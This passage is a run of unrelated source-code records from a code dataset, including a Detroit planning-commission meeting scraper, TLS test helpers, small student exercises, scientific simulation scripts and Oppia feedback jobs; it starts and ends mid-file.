datetime import datetime, time\nfrom urllib.parse import urljoin\n\nfrom dateutil.parser import parse\n\nfrom city_scrapers.constants import COMMISSION\nfrom city_scrapers.spider import Spider\n\n\nclass DetCityPlanningSpider(Spider):\n name = 'det_city_planning'\n agency_name = 'Detroit City Planning Commission'\n timezone = 'America/Detroit'\n allowed_domains = ['www.detroitmi.gov']\n base_url = 'https://www.detroitmi.gov/'\n start_urls = ['https://www.detroitmi.gov/Government/Boards/City-Planning-Commission-Meetings']\n location = {\n 'name': 'Committee of the Whole Room, 13th floor, Coleman A. 
Young Municipal Center',\n 'address': '2 Woodward Avenue, Detroit, MI 48226',\n 'neighborhood': '',\n }\n\n def parse(self, response):\n \"\"\"\n `parse` should always `yield` a dict that follows the Event Schema\n .\n\n Change the `_parse_id`, `_parse_name`, etc methods to fit your scraping\n needs.\n \"\"\"\n meetings = self._parse_meetings(response)\n for meeting_date_time, document_url in meetings.items():\n data = {\n '_type': 'event',\n 'name': 'City Planning Commission',\n 'event_description': '',\n 'classification': COMMISSION,\n 'start': {\n 'date': meeting_date_time.date(),\n 'time': time(17, 00),\n 'note': 'Meeting runs from 5:00 pm to approximately 8:00 pm'\n },\n 'end': {\n 'date': meeting_date_time.date(),\n 'time': time(20, 00),\n 'note': ''\n },\n 'all_day': False,\n 'location': self.location,\n 'documents': self._create_documents(response.url, document_url),\n 'sources': [{\n 'url': response.url,\n 'note': ''\n }]\n }\n\n data['status'] = self._generate_status(data)\n data['id'] = self._generate_id(data)\n\n yield data\n\n def _parse_meetings(self, response):\n meetings = self._parse_has_agenda_meetings(response)\n no_agenda_meetings = self._parse_no_agenda_meetings(response)\n for meeting_date in no_agenda_meetings:\n if meeting_date not in meetings:\n meetings[meeting_date] = no_agenda_meetings[meeting_date]\n return meetings\n\n @staticmethod\n def _parse_no_agenda_meetings(response):\n year_str = datetime.now().year\n meetings = defaultdict(str)\n meetings_text = response.xpath('//tr/td/text()').extract()\n month_day_regex = re.compile(r\"\\w+\\s\\d+\")\n for meeting in meetings_text:\n # Check if cell is actual text\n if meeting[0].isalpha():\n month_day = month_day_regex.search(meeting).group(0)\n meeting_date = parse(month_day + ' ' + str(year_str))\n meetings[meeting_date] = ''\n return meetings\n\n @staticmethod\n def _parse_has_agenda_meetings(response):\n meetings = defaultdict(str)\n date_regex = re.compile(r\"\\w+\\s\\d+,\\s\\d{4}\")\n meeting_agendas = response.xpath('//div[@id=\"dnn_ctr9526_HtmlModule_lblContent\"]//li')\n for agenda in meeting_agendas:\n agenda_link = agenda.xpath('./a/@href').extract_first()\n meeting_date_text = agenda.xpath('./a/text()').extract_first()\n date_text = date_regex.search(meeting_date_text).group(0)\n meeting_date = parse(date_text)\n meetings[meeting_date] = agenda_link\n return meetings\n\n def _create_documents(self, base_url, url):\n \"\"\"\n Parse or generate documents.\n \"\"\"\n if url:\n return [{'url': urljoin(base_url, url), 'note': 'Agenda'}]\n return []\n","sub_path":"city_scrapers/spiders/det_city_planning.py","file_name":"det_city_planning.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559801366","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nUtilities\n\"\"\"\n\nimport os\nimport os.path\nimport ssl\nfrom params import Protocols, KeyExAlgos, CipherSuites\nfrom certs import Certs, CertGroup\n\n\ndef get_cert_group(key_ex_algo):\n \"\"\" Assemble CertGroup based on the specified key exchange algorithm \"\"\"\n\n if key_ex_algo in (\n KeyExAlgos.RSA,\n KeyExAlgos.DHE_RSA,\n KeyExAlgos.ECDHE_RSA):\n return CertGroup(Certs.CA_RSA, Certs.SERVER_RSA, Certs.CLIENT_RSA)\n else:\n return CertGroup(\n Certs.CA_ECDSA,\n Certs.SERVER_ECDSA,\n Certs.CLIENT_ECDSA)\n\n\ndef tls_version(protocol):\n \"\"\" Convert Protocol to TLS protocol option \"\"\"\n\n if protocol == Protocols.TLSV1_0:\n return ssl.TLSVersion.TLSv1\n elif 
protocol == Protocols.TLSV1_1:\n return ssl.TLSVersion.TLSv1_1\n elif protocol == Protocols.TLSV1_2:\n return ssl.TLSVersion.TLSv1_2\n else:\n return None\n\n\ndef openssl_cs(cipher_suite):\n \"\"\" Convert CipherSuite to OpenSSL cipher suite name \"\"\"\n\n if cipher_suite == CipherSuites.TLS_AES_256_GCM_SHA384:\n return 'TLS_AES_256_GCM_SHA384'\n elif cipher_suite == CipherSuites.TLS_AES_128_GCM_SHA256:\n return 'TLS_AES_128_GCM_SHA256'\n elif cipher_suite == CipherSuites.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA:\n return 'ECDHE-RSA-AES256-SHA'\n elif cipher_suite == CipherSuites.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA:\n return 'ECDHE-ECDSA-AES256-SHA'\n elif cipher_suite == CipherSuites.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384:\n return 'ECDHE-ECDSA-AES256-GCM-SHA384'\n elif cipher_suite == CipherSuites.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384:\n return 'ECDHE-RSA-AES256-GCM-SHA384'\n else:\n return None\n\n\nCERT_DIR = os.getenv('TLSTEST.CERT.DIR')\n\n\ndef get_cert_path(cert_file):\n return os.path.join(CERT_DIR, cert_file)\n\n\ndef create_context(protocol, cipher_suite):\n \"\"\"\n Create SSL context with specified protocol and cipher suite.\n The CA and end entity certificate are automatically determined by the cipher suite\n \"\"\"\n\n _context = ssl.SSLContext()\n _tls_version = tls_version(protocol)\n _context.minimum_version = _tls_version\n _context.maximum_version = _tls_version\n\n _context.verify_mode = ssl.CERT_REQUIRED\n _context.check_hostname = False\n\n _context.set_ciphers(openssl_cs(cipher_suite))\n\n _cert_group = get_cert_group(cipher_suite.value.key_ex_algo)\n _context.load_verify_locations(\n cafile=get_cert_path(_cert_group.ca.value.cert_file))\n _context.load_cert_chain(\n certfile=get_cert_path(_cert_group.server_cert.value.cert_file),\n keyfile=get_cert_path(_cert_group.server_cert.value.priv_key_file))\n\n return _context\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634821253","text":"from math import cos, sin, pi\n\nimport numpy as np\nfrom PIL import Image\n\n\ndef rotation(x, y, z, nx, ny, nz, theta):\n r = np.array([x, y, z])\n matrix = np.array([\n [\n cos(theta) + pow(nx, 2) * (1 - cos(theta)),\n nx * ny * (1 - cos(theta)) - nz * sin(theta),\n nz * nx * (1 - cos(theta)) + ny * sin(theta),\n ],\n [\n nx * ny * (1 - cos(theta)) + nz * sin(theta),\n cos(theta) + pow(ny, 2) * (1 - cos(theta)),\n ny * nz * (1 - cos(theta)) - nx * sin(theta),\n ],\n [\n nz * nx * (1 - cos(theta)) - ny * sin(theta),\n ny * nz * (1 - cos(theta)) + nx * sin(theta),\n cos(theta) + pow(nz, 2) * (1 - cos(theta)),\n ],\n ])\n return tuple(map(int, np.dot(r, matrix)))\n\n\ndef main():\n image = Image.open('muta.jpg')\n data = image.getdata()\n\n rgb = image.convert('RGB')\n size = rgb.size\n\n new = Image.new('RGBA', size)\n new_data = []\n for r, g, b in data:\n new_r, new_g, new_b = rotation(r, g, b, 1, 0, 0, pi)\n new_data.append((new_r, new_g, new_b))\n\n new.putdata(new_data)\n\n image.show()\n new.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"624424014","text":"# Дано натуральное число. 
Напишите программу, которая вычисляет:\n#\n# сумму его цифр;\n# количество цифр в нем;\n# произведение его цифр;\n# среднее арифметическое его цифр;\n# его первую цифру;\n# сумму его первой и последней цифры.\n\n\ndef sum_of_digits(n):\n summa = 0\n while n > 0:\n a = n % 10\n summa += a\n n = n // 10\n return summa\n\n\ndef number_of_digits(n):\n total = 0\n while n > 0:\n total += 1\n n = n // 10\n return total\n\n\ndef composition_of_digits(n):\n composition = 1\n while n > 0:\n a = n % 10\n composition *= a\n n = n // 10\n return composition\n\n\ndef average_of_digits(n):\n return sum_of_digits(n) / number_of_digits(n)\n\n\ndef one_number(n):\n a = []\n while n > 0:\n a.append(n % 10)\n n = n // 10\n a.reverse()\n return a[0]\n\n\ndef sum_one_and_last(n):\n a = []\n while n > 0:\n a.append(n % 10)\n n = n // 10\n a.reverse()\n return a[0] + a[-1]\n\n\nn = int(input())\nprint(sum_of_digits(n),\n number_of_digits(n),\n composition_of_digits(n),\n average_of_digits(n),\n one_number(n),\n sum_one_and_last(n),\n sep='\\n')\n","sub_path":"Циклы for и while/Цикл while обработка цифр числа/Programming (3)/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566267776","text":"import math\nimport random\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport scipy as sp\nimport scipy.sparse.linalg\n\nimport os\nimport csv\n\nc = 0.61066405858\na = 0.10460487652\neps = 0.010000043396\ngamma = 1\nI = 0.059990663538\np = [I-1,1+a, -a - 1/gamma, I]\nr = np.roots(p)\n\nt = np.arange(-0.1,1, 0.01)\n#plt.figure()\n#plt.plot(t, t*(1-t)*(t-a)+I)\n#plt.plot(t, 1/gamma*t)\n#plt.show() #Plot of nullclines\n\nu0 = 0.0574370906\nv0=0\nw0 = u0/gamma\np0 = [u0,v0,w0] #Fixed point of ODE system\nf = lambda u: u*(1-u)*(u-a) + I\nfp = lambda u: -3*u**2+2*(a+1)*u-a\n\nfp0 = fp(u0)\nDf0 = [[0,1,0],[-fp0, c,1], [eps/c, 0, -eps*gamma/c]]\n(evals, evecs) = np.linalg.eig(Df0)\n\nrho = np.real(evals)[0]\nomega = np.imag(evals)[0] #Real and imaginary parts of the stable eigenvalues\nmu = np.real(evals)[2] #Real unstable eigenvalue\n\n\nv1= [1.96472656, -0.03617067, -0.00258794]\nv1 = v1/np.linalg.norm(v1)\nv2 = [0, -0.31242932, 0.20229302]\nv2 = v2/np.linalg.norm(v2)\nv3 = [ 0.84547515, 0.53358649, 0.02138313]\nv3 = v3/np.linalg.norm(v3)\nP = [v1,v2,v3]\nPinv = np.transpose([v1,v2,v3])\n\nG = lambda x: Pinv.dot(x - p0) #Change of coordinates function\nGinv = lambda x: P.dot(x) + p0\n\ndef solve(ts, init, c, a, eps, gamma, I):\n \"\"\"Solve 3-D traveling wave ODE for times points ts.\"\"\"\n\n F = lambda y, t: tw_ode(y, c, a, eps, gamma, I)\n #print(F(init, ts))\n\n s = sp.integrate.odeint(F, init, ts)\n return s\n\ndef tw_ode(y, c, a, eps, gamma, I):\n \"\"\"return vector field for 3d traveling waves ODE\"\"\"\n\n u = y[0]\n v = y[1]\n w = y[2]\n udot = v\n vdot = c*v-u*(1-u)*(u-a)-I+w\n wdot = eps*(u-gamma*w)/c\n\n return (udot, vdot, wdot)\n\ncwd=os.getcwd()\nfolder= os.path.join(cwd, '..', 'auto','02.07.17')\n\nsolpath = os.path.join(folder, 'run5_solution_33')\nsolcsv = open(solpath, newline='')\n\nt = []\nu = []\nv = []\nw = []\n\n#Load solution 18 from 02.07.17 to python\nfor j in solcsv:\n row=j.split()\n t.append(float(row[0]))\n #x.append([float(row[1]),float(row[2]),float(row[3])])\n u.append(float(row[1]))\n v.append(float(row[2]))\n w.append(float(row[3]))\n\nx = 
np.array([u,v,w]) #x = solution array from AUTO. Rows are u,v,w\ny = np.apply_along_axis(G, 0, x ) #y = new coordinates. Fixed point now near origin.\nxs = np.arange(-.4, 1, 0.05)\nys = np.arange(-0.1,0.2,0.01)\nzs = np.arange(-0.05,0.04,0.005)\n\nnx = np.zeros(len(xs))\nny = np.zeros(len(ys))\nnz = np.zeros(len(zs))\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n\nax.plot(xs,nx,nx) # {y = z = 0} blue\nax.plot(ny,ys,ny) # {x = z = 0} green\nax.plot(nz,nz,zs) # {x = y = 0} red\n#ax.plot(y[0,0:50], y[1,0:50], y[2,0:50])\nax.plot(y[0,200:400],y[1,200:400],y[2,200:400])\n\nplt.show()\n","sub_path":"python/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128449016","text":"#encoding: UTF-8\n#Autor: Marina Itzel Haro Hernández, A01373471\n#Tarea 06 - While\n\n\ndef calcularInsectos():\n insectos = int(input(\"Insectos recolectados hoy\"))\n dia = 1\n while insectos < 30 :\n e = 30 - insectos\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te hace falta recolectar\", e, \"insectos\")\n dia += 1\n insectos2 = int(input(\"Insectos recolectados hoy\"))\n insectos += insectos2\n \n \n if insectos >= 30:\n if insectos == 30:\n e = 30 - insectos\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te hace falta recolectar %d insecto(s)\" % e)\n \n if insectos > 30:\n f = insectos - 30\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te has pasado con %d insecto(s)\" % f)\n \n print (\"Felicidades has llegado a la meta\")\n \n return (dia, insectos)\n \n \n \ndef calcularMayor():\n numero = 0\n m = 0\n while numero != -1 :\n numero = int(input(\"Teclea un número entero positivo\"))\n print(numero)\n if numero > m:\n m = numero\n if m == 0 :\n print(\"No hay datos para encontar el valor mayor.\")\n else:\n print (\"El mayor es:\", m)\n\n \ndef main():\n opcion = 0\n while opcion != 3 :\n print (\"\\n\")\n opcion = int(input(\"1. Encontrar mayor \\n2. Recolectar insectos \\n3. Salir \\nTeclea tu opción\"))\n if opcion == 1 :\n calcularMayor()\n elif opcion == 2 :\n calcularInsectos()\n elif opcion == 3 :\n print(\"Adios\")\n else:\n print(\"Ingresa una oción válida\")\n \nmain()\n \n \n ","sub_path":"Tarea 06.py","file_name":"Tarea 06.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"333914221","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 17 19:12:35 2017\r\n\r\n@author: Olivia\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage.filters import gaussian_filter\r\n \r\n\r\nclass one_dim_Distribution(object):\r\n '''A one_dim_Distribution object is a distribution of charged particles \r\n along a line. There is an electric field defined by a magnitude (V/micron) \r\n and starting and ending positions along the line. 
The position of \r\n charged particles can be updated to reflect movement over time under the \r\n effects of drift and diffusion.\r\n\r\n Input:\r\n FRACTION_FAST_NEG (fraction of defects which are negative and have \r\n mobilities on the order of 10^-10 cm^2/Vsec)\r\n FRACTION_FAST_POS (fraction of defects which are positive and have \r\n mobilities on the order of 10^-10 cm^2/Vsec)\r\n FRACTION_SLOW_NEG (fraction of defects which are negative and have \r\n mobilities on the order of 10^-11 cm^2/Vsec)\r\n FRACTION_SLOW_POS (fraction of defects which are positive and have \r\n mobilities on the order of 10^-11 cm^2/Vsec) \r\n ELECTRIC_FIELD_STRENGTH (voltage applied accross electrodes)\r\n MOBILITY_POS (mobilitiy of fast, positive defects, micron^2/Vhr)\r\n MOBILITY_NEG (mobilitiy of fast, negative defects, micron^2/Vhr)\r\n MOBILITY_POS_SLOW (mobilitiy of slow, positive defects, micron^2/Vhr)\r\n MOBILITY_NEG_SLOW (mobilitiy of slow, negative defects, micron^2/Vhr)\r\n \r\n BIASED_WIDTH (distance between electrodes, microns)\r\n SAMPLE_SIZE (x-dimension of sample region, microns)\r\n DEFECT_CONC (number of defects per square micron)\r\n \r\n \r\n Initialization: initializing a Distribution object randomly generates a \r\n list of particle positions, with the length of the list given by the \r\n DEFECT_CONC and SAMPLE_SIZE'''\r\n \r\n def __init__ (self,FRACTION_FAST_NEG,FRACTION_FAST_POS,FRACTION_SLOW_NEG,\r\n FRACTION_SLOW_POS,ELECTRIC_FIELD_STRENGTH,MOBILITY_POS,\r\n MOBILITY_NEG,MOBILITY_POS_SLOW,MOBILITY_NEG_SLOW,\r\n BIASED_WIDTH,SAMPLE_SIZE,DEFECT_CONC):\r\n \r\n self.FRACTION_FAST_NEG = FRACTION_FAST_NEG\r\n self.FRACTION_FAST_POS = FRACTION_FAST_POS\r\n self.FRACTION_SLOW_POS = FRACTION_SLOW_POS\r\n self.FRACTION_SLOW_NEG = FRACTION_SLOW_NEG \r\n self.BIASED_WIDTH = BIASED_WIDTH \r\n self.DEFECT_CONC = DEFECT_CONC\r\n self.SAMPLE_SIZE = SAMPLE_SIZE\r\n self.ELECTRIC_FIELD_STRENGTH = ELECTRIC_FIELD_STRENGTH\r\n self.MOBILITY_POS = MOBILITY_POS\r\n self.MOBILITY_NEG = MOBILITY_NEG\r\n self.MOBILITY_POS_SLOW = MOBILITY_POS_SLOW\r\n self.MOBILITY_NEG_SLOW = MOBILITY_NEG_SLOW\r\n \r\n self.DIFFUSIVITY_POS = self.MOBILITY_POS*0.0257\r\n self.DIFFUSIVITY_NEG = self.MOBILITY_NEG*0.0257\r\n self.DIFFUSIVITY_POS_SLOW = self.MOBILITY_POS_SLOW*0.0257\r\n self.DIFFUSIVITY_NEG_SLOW = self.MOBILITY_NEG_SLOW*0.0257\r\n #um^2/min, D = mukBT/q \r\n \r\n self.DIFFUSION_STD_POS = (2.0*self.DIFFUSIVITY_POS)**0.5\r\n self.DIFFUSION_STD_NEG = (2.0*self.DIFFUSIVITY_NEG)**0.5\r\n self.DIFFUSION_STD_POS_SLOW = (2.0*self.DIFFUSIVITY_POS_SLOW)**0.5\r\n self.DIFFUSION_STD_NEG_SLOW = (2.0*self.DIFFUSIVITY_NEG_SLOW)**0.5\r\n #varience = 2Dt\r\n \r\n self.BIASED_REGION_START = int(self.SAMPLE_SIZE/2- self.BIASED_WIDTH/2) \r\n self.BIASED_REGION_END = int(self.SAMPLE_SIZE/2 + self.BIASED_WIDTH/2)\r\n \r\n ELECTRIC_FIELD = [0 for n in range(self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD2 = [self.ELECTRIC_FIELD_STRENGTH/self.BIASED_WIDTH \r\n for m in range(self.BIASED_REGION_END-self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD3 = [0 for n in range(self.SAMPLE_SIZE-\r\n self.BIASED_REGION_END)]\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD2)\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD3)\r\n self.ELECTRIC_FIELD = ELECTRIC_FIELD\r\n \r\n self.DRIFT_STRENGTH_POS = (self.MOBILITY_POS*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n self.DRIFT_STRENGTH_NEG = (self.MOBILITY_NEG*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n self.DRIFT_STRENGTH_POS_SLOW = (self.MOBILITY_POS_SLOW*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n 
self.DRIFT_STRENGTH_NEG_SLOW = (self.MOBILITY_NEG_SLOW*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n \r\n self.defects = self.SAMPLE_SIZE*np.random.rand(int(self.DEFECT_CONC*\r\n self.SAMPLE_SIZE))\r\n \r\n \r\n def update_defects(self,step):\r\n ''' Update the location of each defect.'''\r\n \r\n if step % 5 != 0:\r\n self.update_electric_field() \r\n \r\n #Defects of varied sign (negative (n) or positive (p)) and mobility \r\n # (fast (f) or slow (s)) are differentiated by their position in \r\n #the list of defects. The order of the defect types is:\r\n #[neg fast, neg slow, pos fast, pos slow] and the start and end of \r\n #each type is defined by the fraction of defects which are each type\r\n nf_end = int(len(self.defects)*self.FRACTION_FAST_NEG) \r\n #index indicating end of negative, fast defects\r\n ns_end = nf_end + int(len(self.defects)*self.FRACTION_SLOW_NEG)\r\n #index indicating end of negative, slow defects\r\n pf_end = ns_end + int(len(self.defects)*self.FRACTION_FAST_POS)\r\n #index indicating end of positive, fast defects. The rest of the \r\n #defects in the list are positive, slow defects\r\n \r\n movement_values = [0 for x in range(len(self.defects))]\r\n \r\n #NEGATIVE DEFECTS\r\n for point in range(ns_end):\r\n if point in range(0,nf_end):\r\n #Drift\r\n movement_values[point] -= \\\r\n self.DRIFT_STRENGTH_NEG[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_NEG)\r\n if point in range(nf_end,ns_end):\r\n #Drift\r\n movement_values[point] -= \\\r\n self.DRIFT_STRENGTH_NEG_SLOW[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_NEG_SLOW)\r\n \r\n #POSITIVE DEFECTS\r\n for point in range(ns_end,len(self.defects)):\r\n if point in range(ns_end,pf_end):\r\n #Drift\r\n movement_values[point] += \\\r\n self.DRIFT_STRENGTH_POS[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_POS)\r\n if point in range(pf_end,len(self.defects)):\r\n #Drift\r\n movement_values[point] += \\\r\n self.DRIFT_STRENGTH_POS_SLOW[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_POS_SLOW)\r\n \r\n self.defects += movement_values \r\n \r\n #Handle defects which go off the end of the sample\r\n for point in range(len(self.defects)):\r\n if self.defects[point] < 0.0:\r\n self.defects[point] = 1\r\n if self.defects[point] >= self.SAMPLE_SIZE:\r\n self.defects[point] = self.SAMPLE_SIZE-1\r\n \r\n# \r\n def update_electric_field(self):\r\n '''Update the electric field based on the applied voltage and the\r\n location of charged defects'''\r\n \r\n E = self.get_ELECTRIC_FIELD()\r\n defects = np.round(self.get_defects(),0)\r\n FRACTION_NEG = self.FRACTION_FAST_NEG + self.FRACTION_SLOW_NEG\r\n \r\n for n in range(self.SAMPLE_SIZE):\r\n distance = np.asarray(defects - n)\r\n if FRACTION_NEG >= 1.0:\r\n elec_change_pos = 0\r\n else:\r\n elec_change_pos = -(8.00 *10**-5* 1/(distance[int(len(defects)*\r\n FRACTION_NEG):])**2)*np.sign(distance[int(len(defects)*\r\n FRACTION_NEG):])\r\n if FRACTION_NEG <= 0:\r\n elec_change_neg = 0\r\n else:\r\n elec_change_neg = (8.00 *10**-5*1/(distance[:int(len(defects)*\r\n FRACTION_NEG)])**2)*np.sign(distance[:int(len(defects)*\r\n FRACTION_NEG)])\r\n \r\n E[n] += np.nansum(elec_change_neg) + np.nansum(elec_change_pos)\r\n \r\n self.DRIFT_STRENGTH_POS = self.MOBILITY_POS*np.asfarray(E)\r\n self.DRIFT_STRENGTH_NEG = 
self.MOBILITY_NEG*np.asfarray(E)\r\n self.DRIFT_STRENGTH_POS_SLOW = self.MOBILITY_POS_SLOW*np.asfarray(E)\r\n self.DRIFT_STRENGTH_NEG_SLOW = self.MOBILITY_NEG_SLOW*np.asfarray(E)\r\n \r\n def plot_electric_field(self):\r\n '''Plot the current electric field along the sample'''\r\n \r\n x = [1 + m for m in range(0,self.SAMPLE_SIZE)]\r\n E = self.DRIFT_STRENGTH_POS/self.MOBILITY_POS\r\n plt.plot(x,E)\r\n \r\n def get_ELECTRIC_FIELD(self):\r\n '''Get the electric field at each micron size step along the sample'''\r\n ELECTRIC_FIELD = [0 for n in range(self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD2 = [self.ELECTRIC_FIELD_STRENGTH/self.BIASED_WIDTH for \r\n m in range(self.BIASED_REGION_END-self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD3 = [0 for n in range(self.SAMPLE_SIZE-\r\n self.BIASED_REGION_END)]\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD2)\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD3)\r\n return ELECTRIC_FIELD\r\n \r\n def get_histogram(self,data,color):\r\n '''Plot a histogram of the defect positions'''\r\n \r\n smoothed = gaussian_filter(data, sigma=2)\r\n plt.plot(smoothed,)\r\n plt.axis([0,self.SAMPLE_SIZE,15,self.DEFECT_CONC+5])\r\n plt.xlabel(\"Distance (um)\")\r\n plt.ylabel(\"Number of Defects\")\r\n plt.title(\"Defect Migration\")\r\n \r\n def get_defects(self):\r\n '''Get the current positions of all defects'''\r\n return self.defects\r\n \r\ndef main():\r\n \r\n MOBILITY_POS = 3.5*10**-10*(10**4)*(10**4)*60*60\r\n #um^2/Vhr\r\n MOBILITY_NEG = 3.825*10**-10*(10**4)*(10**4)*60*60\r\n #um^2/Vhr\r\n MOBILITY_POS_SLOW = 1.8*10**-11*(10**4)*(10**4)*60*60\r\n MOBILITY_NEG_SLOW = 1.8*10**-11*(10**4)*(10**4)*60*60\r\n BIASED_WIDTH = 195\r\n #um\r\n SAMPLE_SIZE = 400\r\n DEFECT_CONC = 50\r\n \r\n FRACTION_SLOW_NEG = 0.32\r\n FRACTION_SLOW_POS = 0.39\r\n FRACTION_FAST_NEG = 0.18\r\n FRACTION_FAST_POS = 0.11\r\n #Defects/um, about 10^16 defects/cm^3\r\n \r\n ELECTRIC_FIELD_STRENGTH = 12\r\n\r\n plt.figure()\r\n curves = []\r\n colors = [\"black\",\"red\", \"orangered\", \"orange\",\"yellow\",\"lime\",\"cyan\",\r\n \"skyblue\",\"blue\",\"darkviolet\",\"magenta\"]\r\n \r\n for smooth in range(10):\r\n #Simulation is run 10 times and averaged\r\n \r\n dist = one_dim_Distribution(FRACTION_FAST_NEG,FRACTION_FAST_POS,\r\n FRACTION_SLOW_NEG,FRACTION_SLOW_POS,\r\n ELECTRIC_FIELD_STRENGTH,MOBILITY_POS,\r\n MOBILITY_NEG,MOBILITY_POS_SLOW,\r\n MOBILITY_NEG_SLOW,BIASED_WIDTH,\r\n SAMPLE_SIZE,DEFECT_CONC)\r\n \r\n curve_smooth = []\r\n curve_smooth.append(np.histogram(dist.defects,bins = SAMPLE_SIZE)[0]) \r\n \r\n for time in range(47):\r\n dist.update_defects(time)\r\n if time in [0,1,2,3,4,5,22,27,30]:\r\n curve_smooth.append(np.histogram(dist.defects,\r\n bins = SAMPLE_SIZE)[0])\r\n curves.append(curve_smooth)\r\n \r\n average = np.average(curves,0)\r\n \r\n for timestamp in range(len(curves[0])): \r\n dist.get_histogram(average[timestamp],colors[timestamp])\r\n \r\n plt.savefig(\"1D_defect_migration.jpg\")\r\n plt.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"1D_model.py","file_name":"1D_model.py","file_ext":"py","file_size_in_byte":12501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192158920","text":"# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"One-off jobs for feedback.\"\"\"\n\nimport ast\nimport logging\n\nfrom constants import constants\nfrom core import jobs\nfrom core.domain import feedback_services\nfrom core.platform import models\n\n(feedback_models,) = models.Registry.import_models([models.NAMES.feedback])\n\n\nclass FeedbackThreadMessagesCountOneOffJob(jobs.BaseMapReduceOneOffJobManager):\n \"\"\"One-off job for calculating the number of messages in a thread.\"\"\"\n\n @classmethod\n def entity_classes_to_map_over(cls):\n return [feedback_models.FeedbackMessageModel]\n\n @staticmethod\n def map(item):\n yield (item.thread_id, item.message_id)\n\n @staticmethod\n def reduce(key, stringified_message_ids):\n message_ids = [\n ast.literal_eval(v) for v in stringified_message_ids]\n\n thread_model = feedback_models.FeedbackThreadModel.get(key)\n next_message_id = max(message_ids) + 1\n thread_model.message_count = next_message_id\n thread_model.put(update_last_updated_time=False)\n\n if next_message_id != len(message_ids):\n exploration_and_thread_id = key.split('.')\n exploration_id = exploration_and_thread_id[0]\n thread_id = exploration_and_thread_id[1]\n thread = feedback_services.get_thread(exploration_id, thread_id)\n logging.error(\n 'The number of messages in the thread, given by the id %s is %s'\n '. But the number of messages as estimated by the message ids '\n 'is %s. Therefore the estimate is not equal to the actual '\n 'number of messages.' 
% (\n                key, len(message_ids), next_message_id))\n\n            yield ('error', {\n                'subject': thread.subject,\n                'exploration_id': exploration_id,\n                'thread_id': thread_id,\n                'next_message_id': next_message_id,\n                'message_count': len(message_ids)\n            })\n\n\nclass FeedbackSubjectOneOffJob(jobs.BaseMapReduceOneOffJobManager):\n    \"\"\"One-off job for updating the feedback subject.\"\"\"\n\n    DEFAULT_SUBJECT = u'(Feedback from a learner)'\n\n    @classmethod\n    def entity_classes_to_map_over(cls):\n        return [feedback_models.FeedbackThreadModel]\n\n    @staticmethod\n    def map(item):\n        if item.subject != FeedbackSubjectOneOffJob.DEFAULT_SUBJECT:\n            return\n\n        first_message = feedback_services.get_message(\n            item.exploration_id, item.thread_id, 0)\n\n        if not first_message.text:\n            return\n\n        if len(first_message.text) > constants.FEEDBACK_SUBJECT_MAX_CHAR_LIMIT:\n            updated_subject = first_message.text[\n                